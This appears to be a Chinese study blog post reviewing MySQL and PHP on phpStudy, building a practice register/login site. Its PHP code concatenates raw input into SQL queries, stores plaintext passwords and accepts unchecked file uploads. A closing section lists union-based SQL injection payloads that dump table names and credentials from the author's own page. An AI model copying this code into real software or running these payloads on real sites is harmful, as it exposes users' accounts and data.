【在xp.cn上】MySQL+PHP复习

notes / Database notes / PHP notes
字数统计: 4.2k   |   阅读时长≈ 21 分钟

xp.cn下的MySQL

本地的MySQL之前被卸载了,为了不跟小皮的冲突

访问xp.cn的MySQL路径:phpstudy_pro\Extensions\MySQL5.7.26\bin

在当前路径下访问cmd

mysql -uroot -p 密码可见小皮界面的数据库模块

show databases; 查看所有库

use database_name; 使用某个库

show tables; 显示当前库中所有的表

select * from table_name; 显示当前库中某表的所有内容

创建数据库与表,插入数据

数据库的整体结构:

  • 电脑(服务器)->数据库软件(mysql、mssql、甲骨文、mariadb…)->数据库-> 表->字段

数据库进入方法:

​ 1、直接进入

​ 2、使用软件连接

​ 3、使用phpmyadmin //注意,PHP版本要高于7.0才可以直接使用

​ 进入sql代码,在mysql的bin路径输入

.\mysql.exe -h 127.0.0.1 -u root -p

数据库操纵语句

  • 查询MySQL内的数据库

    • show databases;`

  • 创建库

    • create database kkk;`

  • 删除库

    • drop database kkk;`

  • 创建表,之前需要先构思好表单的结构,然后创建每个表的属性

iduserpassphone
1admin12345613800000000
自增数字字符串字符串数字
1
2
3
4
5
6
7
8
9
use kkk; //进入库
//创建kkk_tbl表
CREATE TABLE IF NOT EXISTS `kkk_tbl`(
`id` INT UNSIGNED AUTO_INCREMENT,
`user` VARCHAR(10) NOT NULL,
`pass` VARCHAR(10) NOT NULL,
`phone` INT(11) NOT NULL,
PRIMARY KEY ( `id` )
)ENGINE=InnoDB DEFAULT CHARSET=utf8;

  • NOT NULL - 每一行都必须含有值(不能为空),null 值是不允许的。

  • DEFAULT value - 设置默认值

  • UNSIGNED - 使用无符号数值类型,0 及正数

  • AUTO INCREMENT - 设置 MySQL 字段的值在新增记录时每次自动增长 1

  • PRIMARY KEY - 设置数据表中每条记录的唯一标识。 通常列的PRIMARY KEY 设置为 ID 数值,与 AUTO_INCREMENT 一起使用。

查看表的框架

desc kkk_tbl;

1
2
3
4
5
+-------+------------------+------+-----+---------+----------------+ | Field | Type | Null | Key |
Default | Extra | +-------+------------------+------+-----+---------+----------------+ | id | int(10)
unsigned | NO | PRI | NULL | auto_increment | | user | varchar(10) | NO | | NULL | | | pass |
varchar(10) | NO | | NULL | | | phone | int(11) | NO | | NULL | | +-------+------------------+------+--
---+---------+----------------+

  • 增加数据

    • insert into kkk_tbl(user,pass,phone) values('admin','123456','1380000000');

  • 删除数据

    • delete from kkk_tbl where user="admin";

PHP联动MySQL

  • PHP创建数据库
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// 面向过程
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
// 创建连接
$conn = mysqli_connect($servername, $username, $password);
// 检测连接
if (!$conn) {
	die("连接失败: " . mysqli_connect_error());
}
// 创建数据库
$sql = "CREATE DATABASE myDB";  // 数据库名为myDB
if (mysqli_query($conn, $sql)) {
	echo "数据库创建成功";
} else {
	echo "Error creating database: " . mysqli_error($conn);
}
mysqli_close($conn);
?>
  • 连接数据
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
// 创建连接
$conn = mysqli_connect($servername, $username, $password);
// 检测连接
if (!$conn) {
	die("连接失败: " . mysqli_connect_error());
}
?>
  • 其他需要调用该文件的php
1
2
3
4
5
6
7
8
9
10
11
12
13
<head>
<meta charset=utf-8>
</head>
<?php
include("conn.php");
$sql = "create DATABASE myDaB";
if (mysqli_query($conn, $sql)) {
	echo "数据库创建成功";
} else {
	echo "Error creating database: " . mysqli_error($conn);
}
mysqli_close($conn);  // 关闭连接
?>
  • 面向对象的
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
// 创建连接
$conn = new mysqli($servername, $username, $password);
// 检测连接
if ($conn->connect_error) {
	die("连接失败: " . $conn->connect_error);
}
// 创建数据库
$sql = "CREATE DATABASE myDB";
if ($conn->query($sql) === TRUE) {
	echo "数据库创建成功";
} else {
	echo "Error creating database: " . $conn->error;
}
$conn->close();  // 关闭连接
?>
  • 使用PDO
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
try {
	$conn = new 		PDO("mysql:host=$servername",$username,$password);
	// 设置 PDO 错误模式为异常
	$conn->setAttribute(PDO::ATTR_ERRMODE, 	PDO::ERRMODE_EXCEPTION);
	$sql = "CREATE DATABASE myDBPDO";
// 使用 exec() ,因为没有结果返回
	$conn->exec($sql);
	echo "数据库创建成功<br>";
}
catch(PDOException $e) {
	echo $sql . "<br>" . $e->getMessage();
}
$conn = null;  // 关闭连接
?>
  • 创建表(面对过程)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
//需要设置进去的库
conn.php 文件 新增
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "myDB";
// 创建连接
$conn = mysqli_connect($servername, $username, $password, $dbname);
// 检测连接
if (!$conn) {
	die("连接失败: " . mysqli_connect_error());
}
?>
  • 生成表内基本框架
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<head>
<meta charset=utf-8>
</head>
<?php
include("conn.php");
$sql = "CREATE TABLE IF NOT EXISTS `kkk_tbl`(
`id` INT UNSIGNED AUTO_INCREMENT,
`user` VARCHAR(10) NOT NULL,
`pass` VARCHAR(10) NOT NULL,
`phone` INT(11) NOT NULL,
PRIMARY KEY ( `id` )
)ENGINE=InnoDB DEFAULT CHARSET=utf8;";

if (mysqli_query($conn, $sql)) {
	echo "数据表创建成功";
} else {
	echo "创建数据表错误: " . mysqli_error($conn);
}
mysqli_close($conn);  // 关闭连接
?>

注册界面任务分解

网站注册界面/网站首页

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<head>
<meta charset="utf-8">
</head>
<?php

$name=$_POST['name'];
$password1=$_POST['password1'];
$password2=$_POST['password2'];
$shouji=$_POST['shouji'];
$tupian=$_FILES['tupian'];

// echo $name,$password1,$password2,$shouji,$tupian; 输出验证

if ($_SERVER["REQUEST_METHOD"] == "POST"){
	if(empty($name) ||
	empty($password1) ||
	empty($password2) ||
	empty($shouji)){
$ERR="账号密码、手机号码不能为空";
//密码长度8位,密码两次输入一致
//密码验证
//手机11位
//文件上传jpg
} elseif(strlen($password1)<8){
	$ERR="密码长度不足八位";
} elseif($password1!=$password2){
	$ERR="两次输入密码不一致";
} elseif(strlen($shouji)!="11"){
	$ERR="手机号码格式有问题";
} else{
	$ERR="注册成功";
	echo $_FILES["tupian"]["name"];
        
if (file_exists("tupian/" . $_FILES["tupian"]["name"])){
	echo $_FILES["tupian"]["name"] . " 文件已经存在。 ";
} else{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
	move_uploaded_file($_FILES["tupian"]["tmp_name"], "tupian/" . $_FILES["tupian"]["name"]);
// echo "文件存储在: " . "tupian/" . $_FILES["tupian"]["name"];
}
}
}
?>
    
<form action=""method="post"enctype="multipart/form-data" >
名字:
<input type="text" name="name" > <br>
密码:
<input type="password" name="password1" ><br>
重新输入密码:
<input type="password" name="password2" ><br>
请输入手机号码:
<input type="passwrd" name="shouji" ><br>
上传头像:
<input type="file" name="tupian" ><br>
<input type="submit" value="提交">
</form>
<?php
echo $ERR;
echo "你注册的用户为:".$name."</br>";
echo "你注册的手机号码:".$shouji."</br>";
?>
<img src="<?php echo "tupian/".$_FILES["tupian"]["name"]; ?>">

需求

​ 1、先判断是否有库,如果没有库就创建

​ 2、判断是否有表,没有表直接创建

​ 3、注册成功后直接将数据插入到表的内容里面

最后代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// conn.php
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "kkk";


// 创建连接
$conn = mysqli_connect($servername, $username, $password);
$conn2 = mysqli_connect($servername, $username, $password, $dbname);


// 检测连接
if (!$conn) {
	die("连接失败: " . mysqli_connect_error());
} else{
// echo "数据连接成功</br>";
	if(mysqli_connect($servername, $username, $password, $dbname)){
// // echo "数据库已经存在";
// $conn2 = mysqli_connect($servername, $username, $password, $dbname);
} else{
	echo "开始自动创建数据库</br>";
	$sql = "create DATABASE ".$dbname;
	mysqli_query($conn, $sql);
	echo "数据库创建成功</br>";
	$createtbl="CREATE TABLE IF NOT EXISTS `kkk_tbl`(
    `id` INT UNSIGNED AUTO_INCREMENT,
    `user` VARCHAR(10) NOT NULL,
    `pass` VARCHAR(10) NOT NULL,
    `phone` VARCHAR(11) NOT NULL,
    `file` VARCHAR(30) ,
	PRIMARY KEY ( `id` )
) ENGINE=InnoDB DEFAULT CHARSET=utf8;";
	$conn2 = mysqli_connect($servername, $username, $password, $dbname);
	mysqli_query($conn2, $createtbl);
	echo "数据表创建成功</br>";
}
}
// mysqli_close($conn);
?>
}
}
// mysqli_close($conn);
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
// 最后整合.php
<head>
<meta charset="utf-8">
</head>
<?php
    
include("conn.php");

$name=$_POST['name'];
$password1=$_POST['password1'];
$password2=$_POST['password2'];
$shouji=$_POST['shouji'];
$tupian=$_FILES['tupian'];

if ($_SERVER["REQUEST_METHOD"] == "POST") {
	if(empty($name) && empty($password1) &&
		empty($password2) && empty($shouji)){
		$zhErr="用户名、密码、手机号码不能为空";
	} elseif(strlen($password1)<8){
		$zhErr="密码长度必须大于等于8位";
	} elseif($password1!=$password2){
		$zhErr="两次密码不一致";
	} elseif(strlen($shouji)!=11){
		$zhErr="手机号码不符合规范";
	} else{
	//开始处理图片
	if (file_exists("tupian/" . $tupian["name"])){
		echo $tupian["name"] . " 文件已经存在。 ";
	} else{
	// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
		move_uploaded_file($tupian["tmp_name"], "tupian/" . $tupian["name"]);
		$tupianfile=$tupian['name'];
		echo "文件存储在:tupian/".$tupianfile;
	}
	$tupianfile=$tupian['name'];
	$sqlinsert="
	insert into kkk_tbl(user,pass,phone,file)
	values('$name','$password1','$shouji','$tupianfile');
";
        
echo "$sqlinsert";
var_dump($conn2);
if(mysqli_query($conn2, $sqlinsert)){
		$zhErr="注册成功";
} else{
		$zhErr="注册失败";
}
}
}
?>
    
    
<form action=""method="post"enctype="multipart/form-data" >
名字:
<input type="text" name="name" > <br>
密码:
<input type="password" name="password1" ><br>
重新输入密码:
<input type="password" name="password2" ><br>
请输入手机号码:
<input type="passwrd" name="shouji" ><br>
上传图像:
<input type="file" name="tupian" ><br>
<input type="submit" value="提交">
</form>
<?php echo $zhErr."</br>";
?>
<img src="<?php echo "tupian/".$_FILES["tupian"]["name"];?>" alt="上传的图片" />

查询数据

  • SELECT 语句用于从数据表中读取数据:

    SELECT column_name(s) FROM table_name

PHP联动查询

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
include('conn.php');
$chaxun="select * from kkk_tbl;";
$lianjie=mysqli_query($conn2,$chaxun);

// var_dump($lianjie);
while($row=mysqli_fetch_assoc($lianjie)){
    $user=$row['user'];
    $pass=$row['pass'];
    $phone=$row['phone'];
    echo "user:".$user."</br>"."pass:".$pass."</br>"."phone:".$phone."</br>";
}
?>
  • 原始查询代码

select id, username from users where id = 2;

  • 优化后的php代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
include("conn.php");

$chaxunsql=$_GET['chaxun'];
//增加一个判断,判断传入值是数字还是字符串
if(is_numeric($chaxunsql)){
	$chaxunsql="id=$chaxunsql";
} else{
	$chaxunsql="username='$chaxunsql'";
}
$chaxun="select id,username from users where $chaxunsql ";
$reslust=mysqli_query($conn,$chaxun);
//mysqli_fetch_assoc() 查询数据库结果并且赋值为一行
@$row = mysqli_fetch_assoc($reslust);
$id = $row["id"];
$username=$row["username"];
//提取row数字中的username字段
$html = "id:$id</br>username:$username</br>";
?>
    
    
<html>
<head>
	<mate charset="utf-8">
</head>
<h1>请输入你要查询的id或者账号名字</h1>
    
<form action="#" method="get">
    <input type="text" name="chaxun">
    <input type="submit" >
</form>
</html>
<?php echo $html;?>

例:网站登录注册+登录界面Pro

  • 注:注册界面任务分解,先写出最简单的登录页面,只需要能够判断是否登录成功即可
  • 结构:
    • tupian(文件夹,存放静态资源)
    • login.php 登陆界面
    • zhuxiao.php 注销界面
    • conn.php 数据库连接界面
    • zhuce.php 注册界面
    • session.php 管理session
    • youxi.php 假装后台界面

登录页面login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
include("conn.php");

$username=$_POST['username'];
$password=$_POST['password'];
$uapsql="select user,pass from kkk_tbl where user='$username' and pass='$password';";
$reslust=mysqli_query($conn2,$uapsql);
// var_dump($reslust);
// var_dump();
if(mysqli_num_rows($reslust)){
	header('Location:youxi.php');
	session_start();
	$_SESSION['login']='true';
} else{
	$login = "登录失败";
	$_SESSION['login']='false';
}
?>
    
<html>
<head>
<meta charset=utf-8>
</head>
    
<h1>请输入账号以及密码</h1>
<form action="" method="post" ></br>
    <input type="text" name="username"> </br>
    <input type="password" name="password"> </br>
    <input type="submit">
</form>
    
<a href="zhuce.php">点击注册</a></br>
<?php echo $login;?>
</html>

注销界面zhuxiao.php

1
2
3
4
5
6
<?php
    session_start();
    $_SESSION["login"]='false';
    session_destroy();
    header('Location:login.php');
?>

数据库连接界面conn.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<head>
<meta charset=utf-8>
</head>
<?php
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "kkk";
// 创建连接
$conn = mysqli_connect($servername, $username, $password);
$conn2 = mysqli_connect($servername, $username, $password, $dbname);
// 检测连接
if (!$conn) {
	die("连接失败: " . mysqli_connect_error());
} else{
// echo "数据连接成功</br>";
	if(mysqli_connect($servername, $username, $password, $dbname)){
// // echo "数据库已经存在";
// $conn2 = mysqli_connect($servername, $username, $password, $dbname);
} else{
		echo "开始自动创建数据库</br>";
		$sql = "create DATABASE ".$dbname;
		mysqli_query($conn, $sql);
		echo "数据库创建成功</br>";
		$createtbl="CREATE TABLE IF NOT EXISTS `kkk_tbl`(
        `id` INT UNSIGNED AUTO_INCREMENT,
        `user` VARCHAR(10) NOT NULL,
        `pass` VARCHAR(10) NOT NULL,
        `phone` VARCHAR(11) NOT NULL,
        `file` VARCHAR(30) ,
        PRIMARY KEY ( `id` )
        )ENGINE=InnoDB DEFAULT CHARSET=utf8;";
		$conn2 = mysqli_connect($servername, $username, $password, $dbname);
		mysqli_query($conn2, $createtbl);
		echo "数据表创建成功</br>";
}
}
?>

注册界面zhuce.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<head>
<meta charset="utf-8">
</head>
<?php
include("conn.php");

$name=$_POST['name'];
$password1=$_POST['password1'];
$password2=$_POST['password2'];
$shouji=$_POST['shouji'];
$tupian=$_FILES['tupian'];
$tupianname=$_FILES['tupian']['name'];
// echo $name,$password1,$password2,$shouji,$tupian;


if($_SERVER["REQUEST_METHOD"] == "POST"){
    if(empty($name) ||
    empty($password1) ||
    empty($password2) ||
    empty($shouji)){
		$ERR="账号密码、手机号码不能为空";
        //密码长度8位,密码两次输入一致
        //密码验证
        //手机11位
        //文件上传jpg
	} elseif(strlen($password1)<8){
		$ERR="密码长度不足八位";
	} elseif($password1!=$password2){
		$ERR="两次输入密码不一致";
	} elseif(strlen($shouji)!="11"){
		$ERR="手机号码格式有问题";
	} else{
    // echo $_FILES["tupian"]["name"];
		if (file_exists("tupian/" . $_FILES["tupian"]["name"])){
			echo $_FILES["tupian"]["name"] . " 文件已经存在。 ";
		} else{
// 如果 upload 目录不存在该文件则将文件上传到 upload 目录下
			move_uploaded_file($_FILES["tupian"]["tmp_name"], "tupian/" .
			$_FILES["tupian"]["name"]);
			// echo "文件存储在: " . "tupian/" . $_FILES["tupian"]["name"];
}
	$sqlinsert="insert into kkk_tbl(user,pass,phone,file)
	value('$name','$password1','$shouji','$tupianname');";
	var_dump($conn2);
    if(mysqli_query($conn2, $sqlinsert)){
        $ERR="注册成功</br>";
    } else{
        $ERR="注册失败</br>";
    };
}
}
?>
    
    
<form action=""method="post"enctype="multipart/form-data" >
名字:
<input type="text" name="name" > <br>
密码:
<input type="password" name="password1" ><br>
重新输入密码:
<input type="password" name="password2" ><br>
请输入手机号码:
<input type="passwrd" name="shouji" ><br>
上传头像:
<input type="file" name="tupian" ><br>
<input type="submit" value="提交">
</form>
    
    
<?php
echo $ERR;
echo "你注册的用户为:".$name."</br>";
echo "你注册的手机号码:".$shouji."</br>";
?>
    
<img src="<?php echo "tupian/".$_FILES["tupian"]["name"]; ?>">

管理session session.php

1
2
3
4
5
6
7
8
9
10
<?php
session_start();
echo $_SESSION["login"];
if ($_SESSION["login"] == true) {
	echo "您已经成功登陆<a href='zhuxiao.php'>点击注销</a>";
} else {
	$_SESSION["login"] == false;
	die("您无权访问,<a href='login.php'>点击跳转登录页面</a>");
}
?>

假装后台界面 youxi.php

1
2
3
4
5
6
7
8
9
10
11
12
<?php
include('session.php');
?>
    
<html>
    <head>
        <mate charset="utf-8">
        <h1>游戏页面</h1>
        <a href="select.php">点击账号以及ID的对应关系</a>
        <a href="jsq.php">数字炸弹</a>
    </head>
</html>

PHP登录实战

  • 实验七:综合作业(注册、登录、玩游戏)

  • 用户登录以后可以直接打开多个链接,比如之前写入的用户查询页面,计算页面,可以将我们之前写入的都写进来

  • 思路:

    • 将session功能单独变成一个文件,在不同的页面里面引入即可

select.php攻击实战(sql初次尝试)

轮子:admin’ and ‘1’='1

查询字段数量:admin' order by 2--+'

查询回显位置:admin' union select 1,2--+'

查询数据库库:admin' union select database(),2--+'

查询数据表:

  • select table_name from information_schema.tables where table_schema="kkk";

变形:

  • -admin' union select table_name,2 from information_schema.tables where table_schema='kkk

继续查询字段:

  • -admin' union select group_concat(column_name),2 from information_schema.columns where table_name='kkk_tbl

查询数据内容:

-admin' union select group_concat(user,pass),2 from kkk_tbl where '1' ='1

写在后面

有点懵的一话。。。今天因为某些特殊原因有点心不在焉,所以任务的话回头再看看吧。php初级语法就学到这里,我看后面如果要深入学习php的话,ThinkPHP框架是绕不过去的。、

不过就目前看,php还没掌握完全,下一步也没确定。。。。先不急这个

  • Copyrights © 2024-2025 brocademaple
  • 访问人数: | 浏览次数:

      请我喝杯咖啡吧~

      支付宝
      微信